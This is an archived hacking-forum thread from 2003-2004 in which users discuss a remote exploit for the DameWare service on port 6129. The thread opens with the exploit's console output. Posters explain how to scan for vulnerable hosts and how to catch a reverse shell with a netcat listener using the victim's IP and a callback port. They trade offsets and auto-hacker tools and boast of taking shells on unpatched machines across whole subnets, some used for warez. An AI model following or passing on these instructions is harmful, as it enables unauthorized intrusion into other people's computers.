[*] Initializing sockets... [ OK ]
[*] Binding to local port: 12... [ OK ]
[*] Setting up a listener... [ OK ]
OS Info : WINNT4
SP String : Service Pack 6
EIP: 0x77f32836 (kernel32.dll)
[*] Constructing packet for WIN NT4 SP: 6... [ OK ]
[*] Connecting to xx.xxx.xx.xx:6129... [ OK ]
[*] Packet injected!
[*] Waiting for incoming connection...
[x] Exploit appears to have failed!
Axl
Dec 20 2003, 08:50 PM
QUOTE (X-FloppY @ Dec 20 2003, 01:06 AM)
Can someone explain to me how to use this exploit? isaiah shutup, that was mean.
Scan for port 6129 and use the exploit
Axl
Dec 20 2003, 08:52 PM
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isn't a remote exploit... don't forget this ^^
er... yes it is.
Diablotic
Dec 20 2003, 09:02 PM
QUOTE (QuantumTopology @ Dec 20 2003, 08:52 PM)
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isn't a remote exploit... don't forget this ^^
er... yes it is.
Er... it isn't. I mean you need to have an external (exteriar?) IP. For instance I haven't, so I can't use this exploit, am I right? Well, maybe I can, but only from another comp with remote desktop. Am I right?
Axl
Dec 20 2003, 09:19 PM
QUOTE (Diablotic @ Dec 20 2003, 09:02 PM)
QUOTE (QuantumTopology @ Dec 20 2003, 08:52 PM)
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isn't a remote exploit... don't forget this ^^
er... yes it is.
Er... it isn't. I mean you need to have an external (exteriar?) IP. For instance I haven't, so I can't use this exploit, am I right? Well, maybe I can, but only from another comp with remote desktop. Am I right?
Dude, you aren't exploiting yourself.
Quasimod
Dec 20 2003, 09:39 PM
How to check if the listening port 6129 is version 3.72.0.0?
polax
Jan 10 2004, 01:53 AM
Good stuff, it merits reflection.
XtrA
Jan 10 2004, 09:30 AM
isn't that dwmrc.exe good than it?
eagle123
Jan 16 2004, 01:01 PM
Hi! How do I have to compile it?
If I try to compile with C in DOS I get 10 errors.
Yellow_Blue
Jan 17 2004, 06:48 AM
Nice exploit, but I already have an auto hax0r for it ;p
DrDoc
Jan 18 2004, 07:46 AM
LOL nice replies yellow_blue in every thread
rofl
Cya Doc
TheOther
Jan 20 2004, 10:53 AM
Yellow Blue,
Could you share this auto-haxor with us?
Thx
sybexs
Jan 21 2004, 04:57 AM
I still have yet to find an IP with this exploit. I'm just about to give up on it. And plus, since it's a rarity, I doubt finding it will be easy.
Dalrok
Jan 21 2004, 11:44 AM
nice try
Train25
Jan 22 2004, 02:56 AM
I've found quite a few shells but have noticed 2 configs where it will not spawn a shell. Everyone I tried with these configs never spawned a shell. They are: WIN2000 [ver 5.0.2195] Service Pack 4; WINNT4 Service Pack 6.
Did anyone manage to find good offsets for these 2 OSs? If so, please post the offsets here.
Thanks in advance
AsuKa
Feb 4 2004, 02:04 PM
I know this is kind of old, but I have a prog. that filters out all of the bad/false IPs from your logs. If anyone wants, I would be glad to send it to them; can't attach because I'm still a trial member.
net_runner
Feb 4 2004, 02:51 PM
...and I will try it, the replies are good recommendations
Steffan
Feb 4 2004, 04:12 PM
QUOTE (Train25 @ Jan 22 2004, 02:56 AM)
WIN2000 [ver 5.0.2195] Service Pack 4; WINNT4 Service Pack 6.
Did anyone manage to find good offsets for these 2 OSs? If so, please post the offsets here.
W2K SP4 works always.... with the modded exploit....
I'll post the Offsets here when I get back home
C'ya Steven
n4than_69
Feb 4 2004, 04:14 PM
QUOTE (Train25 @ Jan 22 2004, 02:56 AM)
I've found quite a few shells but have noticed 2 configs where it will not spawn a shell. Everyone I tried with these configs never spawned a shell. They are: WIN2000 [ver 5.0.2195] Service Pack 4; WINNT4 Service Pack 6.
Did anyone manage to find good offsets for these 2 OSs? If so, please post the offsets here.
Thanks in advance
How about WinXP [ver 5.1.2600]?
Steffan
Feb 5 2004, 06:56 AM
QUOTE (n4than_69 @ Feb 4 2004, 04:14 PM)
How about WinXP [ver 5.1.2600]?
Same it works and most U get a shell...
I'll upload my own coded exploit so U guyz can get a shell
C'ya Steven
Krogoth
Feb 6 2004, 08:08 AM
Okay, I've tried this tool and can't get a shell from WIN2000 [ver 5.0.2195] Service Pack 4. Well, it works sometimes for WinXP [ver 5.1.2600]. So far not bad at all for the tool, but there's little hope as most DameWare has been patched up.
That's nice of you, Steffan. Your help is greatly appreciated.
AsuKa
Feb 6 2004, 08:32 AM
Krogoth, I have gotten a shell from WIN2000 [ver 5.0.2195] Service Pack 4, maybe the server is behind a firewall? Even though this is old, and servers are being patched up, I still get multiple shells a day just scanning entire subnets. The filter really helps out with the checking since it eliminates most of the duds. Although I don't support fxpboards and setting up stro's for warez, I like to look around, and then remove the remote control service when done.
Fooldj
Feb 7 2004, 03:29 AM
I heard there were 2 versions of this... one by crylor and one by adik... and that one was buggy but the other was fine... anyone know anything about this?
Lusty
Feb 10 2004, 02:39 PM
Nice exploit man... Thanks a lot... nice that it isn't necessary to use nc.exe to listen on the ports like if you use dameweird.
forza
Feb 12 2004, 11:40 PM
It works well in the lab... but how can I see that the remote DameWare is 3.72?
Knutinho
Feb 13 2004, 06:03 AM
@ forza,
One thing u can do is to check your IPs where port 6127 is open. But I don't know any tool which displays the version of the DameWare program running on the other system.
mathofaka
Feb 13 2004, 06:42 PM
nice nice nice exploit, I got like ten shells
for those who don't know how to use it... this is how I do it
I open two shells
I go to where the exploit is at, then I use netcat nc -L -vv -p (any port) like 131, it has to be three numbers. It should say netcat listening on port (whatever u put)
in the other shell u go to where the exploit is at (again), then I type in dameware (the IP of the victim, then your IP) then the port that u put, 131
then wait. If it says patched then forget that person
exposure
Feb 28 2004, 02:55 AM
Hello everybody.
Sorry for bad English.
I have a problem: when I start nc.bat (netcat) and run the autohacker option 2, type scan.txt or whatever, enter. Then it makes a connection to port 444, "connecting" is good, on the screen "done", but at "gathering information" I get a hangup from the autohacker tool. I'm not using a firewall. So I never get any shells on the DOS prompt. Can anybody help me please, what can I do about this problem?